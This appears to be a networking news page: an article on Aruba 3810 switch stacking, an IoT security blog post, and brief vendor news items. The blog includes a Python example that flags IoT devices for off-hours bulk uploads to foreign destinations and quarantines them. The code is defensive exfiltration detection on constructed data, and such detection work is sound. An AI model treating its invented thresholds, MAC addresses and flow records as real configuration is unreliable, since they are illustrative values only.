In the mesh topology you can have up to five stack members:

Aruba 3810 Switch Series stacking: Mesh topology

Why Use Stacking?
One of the major benefits of using stacking (depending on the vendor) is the logical switch view with a single management interface, which makes management and operational tasks very easy.

It also provides link aggregation capability between ports of different physical switches in the same stack, providing better bandwidth and resiliency for the downstream links, and simplifying network design implementation, where “multiple cables” across switches are just one single logical link (using LAG, LACP, EtherChannel or any link aggregation solutions).

Compared to the modular switch option, stackable switches provide a less expensive option (especially for SMB use cases), but with similar scalability and usually with better flexibility. Resiliency and performance can be different (worse or better) depending on the implementation.

With regard to flexibility, you can usually mix different port speeds and media types, and even different switch models with different capabilities (for example, some switches with PoE).

Regarding performance, stacking switches does not necessarily increase performance. It depends on the bandwidth of the stacking cables and on the stacking topology.

Why Shouldn’t You Use Stacking?
The stackable switch market is very mature and relatively stable. However, each vendor adds its own set of features and functionalities, and different vendors use different connectors, cables and software for their stackable switches. As a result, you must use switches from the same product line to take advantage of stacking (not necessarily the same model: in the Aruba 3810 Switch Series, for example, you can mix different models in the same stack).

And there are other potential disadvantages when you use stacked switches:

  • Performance: For SMB use cases, the stack ports and cable speed are enough to provide high bandwidth and low latency. But when speed increases or the stack expands (unless you use a mesh topology) you may increase the latency and decrease the overall performance.
  • Resiliency: Depending on the stacking topology, if you have some faults your overall stack may not be operating correctly anymore. So be sure to choose the best topology and ensure higher resiliency on each stack member. For example, using dual power supplies to ensure hardware redundancy. The single management or control plane may also reduce the overall resiliency, but the problem is similar also on modular switches.
  • Manageability: The single management interface is great, but there are also some drawbacks. First, expanding an existing stack could cause a service disruption for an extended period, such as when all the switches are rebooted to add a stack member or from a power failure. Second, removing a switch from a stack could be tricky or require a complex process. Last but not least, upgrading the firmware on all the stack members, in most cases, requires a complete reboot of all the switches.

Stacking Evolution
To increase the resiliency of stacked switches, vendors offer solutions based on the concept of a "virtual chassis", in which each member keeps its own management and control plane. These solutions are usually implemented on high-end switch models.

Each vendor has its proprietary solution, but for example, on the Aruba 8320 Switch Series (or the Aruba 8325 Switch Series) you can use the Aruba Virtual Switching Extension (VSX).

Related Content
Aruba Switches Series Overview

Configuring an Aruba Switch Stack on Aruba Central

Aruba OS Switch Stacking for Airheads

Blog: Network Security on Modern Switches


Do Something About IoT Security Fears

In a report from the NASA Office of Inspector General, hackers gained access to NASA's Jet Propulsion Laboratory network and stole roughly 500MB of data relating to the Mars missions. The point of entry? A simple Raspberry Pi, a device anyone can buy from Amazon for under 100 USD.

As security professionals, we’re well aware of the risk of IoT devices. Yes, the attack surface has expanded. Yes, there’s a host of unknown vulnerabilities. Yes, device manufacturers don’t always design their products with security top-of-mind. Yes, it’s difficult or impossible to run security agents on IoT devices.

But this isn’t the first time we’ve faced down security challenges. As security professionals, we dealt with the influx of mobile devices. Before we overcame the sky-is-falling challenges of BYOD, we secured laptops, desktops, servers and all sorts of endpoints. And we’ll secure IoT devices, too.

3 Steps to Improving IoT Security
Securing IoT devices comes down to three simple steps:

1. Accurately identify what’s on your network. It may seem obvious, but most network operators simply don’t know the details about every device connected to their wired and wireless networks, and IoT makes it even more challenging. Battery-powered IoT devices can be especially problematic, because they may wake up only briefly to perform a function or to check in, which means they’re popping on and off the network all day.

You need visibility into what these devices are, who is operating the devices, and what they’re doing all day. To get that visibility for IoT, it’s necessary to expand beyond traditional methods of fingerprinting. Innovations like machine learning and deep packet inspection are simplifying the challenge. Machine learning can be used to analyze device attributes and automatically group similar devices together. Deep packet inspection can be used to provide additional context and behavioral information to accurately identify hard-to-detect devices.

2. Enforce policy automatically. You need closed-loop, end-to-end access control from the moment a device joins the network. Given the sheer quantities of IoT devices, automation is necessary. Manual intervention is no longer practical. Develop policies that leverage context, such as the user role, device type, certificate status, location or day of week. When an IoT device joins a network, it can be automatically segmented, keeping traffic separate and secure, with the policy consistently enforced across wired and wireless networks.

3. Monitor for suspicious behavior. Context is critical to understanding what an IoT device is doing. You need to understand the actual behavior of a device: what protocols are being used, what applications and URLs are being accessed. If a security camera begins sending huge amounts of data at 3am to a destination outside the country, for example, you need the ability to automatically quarantine it until you can investigate, fix or replace it.
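The three steps above, worked through as an added example rather than anything from Aruba or ClearPass: a constructed device inventory stands in for the output of step 1, a context-based policy decides the segment at join time (step 2), and constructed flow records are checked against each device type's baseline so that the 3am camera upload gets the device quarantined (step 3). The MAC addresses, policy values, thresholds and flow records are all invented for illustration.

```python
"""Context-based segmentation at join time (step 2) and behaviour-based
quarantine (step 3) for IoT endpoints.  Added example: the device inventory,
policy values, MAC addresses and flow records below are constructed for
illustration and are not ClearPass data, APIs or defaults."""
from collections import defaultdict
from datetime import datetime

QUARANTINE = "vlan-quarantine"

# Constructed inventory, in the shape a fingerprinting/NAC system would give.
DEVICES = {
    "aa:bb:cc:00:00:01": {"type": "ip-camera", "cert_valid": True, "site": "hq"},
    "aa:bb:cc:00:00:02": {"type": "hvac-controller", "cert_valid": True, "site": "hq"},
    "aa:bb:cc:00:00:03": {"type": "unknown", "cert_valid": False, "site": "branch"},
}

# Per-device-type policy: where the device lands and what "normal" looks like.
POLICY = {
    "ip-camera": {"segment": "vlan-cameras", "countries": {"US"},
                  "max_bytes_hour": 50_000_000, "quiet_hours": set(range(0, 6))},
    "hvac-controller": {"segment": "vlan-ot", "countries": {"US"},
                        "max_bytes_hour": 1_000_000, "quiet_hours": set()},
}
QUIET_HOUR_THRESHOLD = 1_000_000  # bytes in a single flow during quiet hours

# Constructed flow records, e.g. NetFlow/IPFIX enriched with a GeoIP lookup.
FLOWS = [
    {"mac": "aa:bb:cc:00:00:01", "ts": "2024-05-14T03:05:00", "bytes": 180_000_000, "dst_country": "RU"},
    {"mac": "aa:bb:cc:00:00:01", "ts": "2024-05-14T09:30:00", "bytes": 2_000_000, "dst_country": "US"},
    {"mac": "aa:bb:cc:00:00:02", "ts": "2024-05-14T10:15:00", "bytes": 40_000, "dst_country": "US"},
    {"mac": "aa:bb:cc:00:00:03", "ts": "2024-05-14T11:00:00", "bytes": 5_000, "dst_country": "US"},
]


def assign_segment(mac):
    """Step 2: decide the segment when a device joins, from its context.
    Unknown types and devices without a valid certificate are isolated."""
    dev = DEVICES.get(mac)
    if dev is None or dev["type"] not in POLICY or not dev["cert_valid"]:
        return QUARANTINE
    return POLICY[dev["type"]]["segment"]


def detect_anomalies(flows):
    """Step 3: compare observed behaviour with the type's baseline.
    Returns {mac: [reason, ...]} for devices that need attention."""
    findings = defaultdict(list)
    per_hour = defaultdict(int)
    for flow in flows:
        dev = DEVICES.get(flow["mac"])
        policy = POLICY.get(dev["type"]) if dev else None
        if policy is None:
            findings[flow["mac"]].append("traffic from an unclassified device")
            continue
        ts = datetime.fromisoformat(flow["ts"])
        if flow["dst_country"] not in policy["countries"]:
            findings[flow["mac"]].append(
                f"destination country {flow['dst_country']} not allowed")
        if ts.hour in policy["quiet_hours"] and flow["bytes"] > QUIET_HOUR_THRESHOLD:
            findings[flow["mac"]].append(
                f"{flow['bytes']} bytes at {ts:%H:%M} during quiet hours")
        hour = ts.replace(minute=0, second=0, microsecond=0)
        per_hour[(flow["mac"], hour)] += flow["bytes"]
    for (mac, hour), total in per_hour.items():
        budget = POLICY[DEVICES[mac]["type"]]["max_bytes_hour"]
        if total > budget:
            findings[mac].append(
                f"{total} bytes in the hour from {hour:%H:%M} exceeds budget of {budget}")
    return dict(findings)


def effective_segments(flows):
    """Join-time decision, then automatic quarantine of anything flagged."""
    findings = detect_anomalies(flows)
    return {mac: QUARANTINE if mac in findings else assign_segment(mac)
            for mac in DEVICES}


if __name__ == "__main__":
    for mac, reasons in detect_anomalies(FLOWS).items():
        print(mac, "->", "; ".join(reasons))
    print(effective_segments(FLOWS))
```

Two design points carry over to a real deployment: the join-time decision fails closed (anything unidentified or without a valid certificate lands in the quarantine segment, not in a default VLAN), and the behavioural checks are per device type, because the HVAC controller's hourly byte budget would be a false positive for a camera and the camera's quiet hours would be meaningless for a device that only talks during the day.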

Banish the Fear with Good Planning
With a good plan and effective tools, you can mitigate the risks of IoT devices while enabling your organization to benefit from their many gains, whether that is improved physical security, monitoring equipment on the factory floor, or automatically adjusting the building’s temperature and lighting for employee comfort and to save energy.

Learn how Aruba ClearPass Device Insight can help you tackle your IoT security challenges.


Fortinet – Secure SD-Branch Solution

Fortinet has announced its Secure SD-Branch solution, which it describes as the industry's most comprehensive for distributed enterprises; it secures the WAN and access edge and enables security-driven networking in distributed organizations. Fortinet's Secure SD-Branch extends the Fortinet Security Fabric and the benefits of SD-WAN to network access, converging WAN and security into one integrated platform. This convergence increases security and visibility, reduces complexity, improves performance and agility, and lowers overall IT costs related to the network edge.


Commvault named HPE Technology Partner of the Year for storage solutions

The broad integration of Commvault's data management and protection solutions with HPE's storage and server portfolio enables companies to simplify recovery readiness, adopt the cloud responsibly and activate their data, generating business value.


Why SMBs believe their data is unsafe in the cloud

Nearly two thirds (61%) of small to medium-sized businesses (SMBs) believe that their data is unsafe in the cloud, and almost a third (29%) say they have suffered a breach since moving to the cloud for storage.


Aruba ClearPass, Access Point Updates Tear Down IoT Security, Connectivity Barriers

Aruba unleashed a new ClearPass offering and series of access points to help enterprises and channel partners wrangle Internet of Things (IoT) endpoints and mobile devices.
